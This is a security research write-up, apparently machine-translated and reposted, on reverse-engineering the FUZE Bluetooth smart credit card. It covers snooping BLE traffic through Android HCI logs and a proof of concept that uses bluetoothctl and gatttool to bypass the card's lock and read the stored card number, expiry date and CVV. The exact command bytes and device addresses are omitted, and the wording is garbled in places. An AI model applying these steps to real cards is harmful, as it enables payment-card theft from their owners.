How to obtain credit card data using Bluetooth

FUZE Card Introduction

FUZE is an IoT device that is the same size as an ordinary credit card. You can use the smartphone App and connect via Bluetooth to program the FUZE card. In order to facilitate users to manage and configure credit cards, BrilliantTS has also released an application called eCARD Manager. When you need to make a payment, you need to select the credit card to use in the mobile app. After the selection is successful, the FUZE card will be equivalent to the credit card you selected.

However, through research, it was found that the security of the card addition and use process is not reliable. To a certain extent, FUZE does deploy some security protection measures. When setting up FUZE for the first time, you need to enter a Six-digit password, but this step can be skipped. Once you configure your passcode, your device will remain locked until you unlock it manually or until your phone is near the card. While locked, you cannot access the data on the card or program the magnetic strip. It also offers an advanced security mode where the card can only be used if the user's phone is connected to it via Bluetooth.

X-ray scanning hardware structure

Unlike common IoT devices, the thickness of the FUZE card is less than one millimeter, so in order to understand the internal structure of the device, Optical scanning is the most suitable. The scanned structure diagram is as follows:

We can see that the main chip is a microcontroller, an e-Paper driver and a Bluetooth SoC, and the motherboard Many functions are not yet used, including NFC and EMV (functional support will be provided later).

Bluetooth protocol reverse analysis

For the FUZE card, the Bluetooth interface is the main target of our reverse analysis. For this purpose, the tools I want to use are as follows:

1. An Android phone;

2. Burp Suite (optional);

3. Wireshark shelled Perl script;

4. Gatttool/BlueZ;

If you want to perform black-box testing on Bluetooth devices, an Android phone is essential. Not only can we monitor Bluetooth communication traffic on the phone, but we can also directly disassemble the Java bytecode. As an HTTP proxy, Burp can intercept API requests between Android Apps and backend servers. The Android chip has a function called "HCI snoop log", which users can turn on in the developer settings menu. This function allows us to save all information about Bluetooth activities in a file, which contains all interaction information between the App and the device. Wireshark can read HCI snoop log information and perform basic filtering and analysis on it. In order to semi-automate the export of data to a text file, here we use a Perl script. Finally, gatttool or other BlueZ tools can be used to perform the most direct penetration analysis of the device and understand the protocol messages.

Reverse FUZE

As we all know, BLE’s pairing protocol is vulnerable, and most devices will implement additional security protection based on it ,. Likewise, FUZE will not send data to any unpaired device or use BLE connection layer encryption. Therefore, gatttool cannot send a request to FUZE without pairing, so I plan to use the Android-based reverse analysis method:

1. Turn on the Bluetooth HCI snoop function on Android;

2. Interact with the FUZE card in the App;

3. Use adb to export HCI logs to PC;

4. Use Wireshark for analysis;

5. Filter and export the data to text;

6. Use Perl script to parse the data;

The reverse analysis results of Wireshark are as follows:

The best thing about HCI snoop is that the data it captures is plaintext data before encryption by the hardware Bluetooth chip, which contains certain ASCII strings and protocol data formats.

Exploitation and PoC

Note: If an attacker can capture the pairing session between the device and the App, the pairing digital PIN code of the FUZE card can be cracked through a brute force attack. of.

First, we need to use bluetoothctl to scan the device and pair it with it:

1. Start bluetoothctl: sudo bluetoothctl;

2. Enable agent client (for pairing): agent on;

3. Scanning device: scan on;

4． After scanning to the FUZE card, disable scanning: scan off;

5. Pair with FUZE card: pair ;

6． Enter the numeric PIN code displayed on the device;

7. Disconnect: disconnect ;

Next, we can use gatttool to send commands to the card:

1. Start gatttool: sudo gatttool -I -b ;

2. Connect device: connect;

3. Subscribe to notifications: char-write-req 1b 0100;

4 . Send command: char-write-req 18 ;

The command we sent is as follows:

The first command can be bypassed Through the lock screen function of the device, the first credit card number, expiration date and CVV in the device can be read the next day.

Summary

There was Apple Pay and Samsung Pay before, and there was FUZE smart card later. The entire payment industry is trying its best to realize it. Cardless payment, although I personally don’t think Bluetooth credit cards have much practical significance, but since it already exists, we must find ways to ensure its security.

Recommended related articles and tutorials: Web server security

The above is the detailed content of How to obtain credit card data using Bluetooth. For more information, please follow other related articles on the PHP Chinese website!